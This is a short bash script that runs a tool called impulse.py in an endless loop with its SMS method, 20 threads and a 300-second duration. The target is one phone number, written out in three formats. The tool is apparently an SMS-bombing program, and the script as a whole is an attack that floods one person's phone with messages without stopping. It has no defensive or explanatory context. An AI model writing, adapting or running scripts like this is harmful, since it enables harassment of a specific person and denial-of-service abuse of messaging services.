#!/bin/bash

_time=300
_threads=20
_number=+380661483904
_number2=380661483904
_number3=0661483904

while [ 1=1 ]
do
python impulse.py --method SMS --time $_time --threads $_threads --target $_number

python impulse.py --method SMS --time $_time --threads $_threads --target $_number2

python impulse.py --method SMS --time $_time --threads $_threads --target $_number3
done
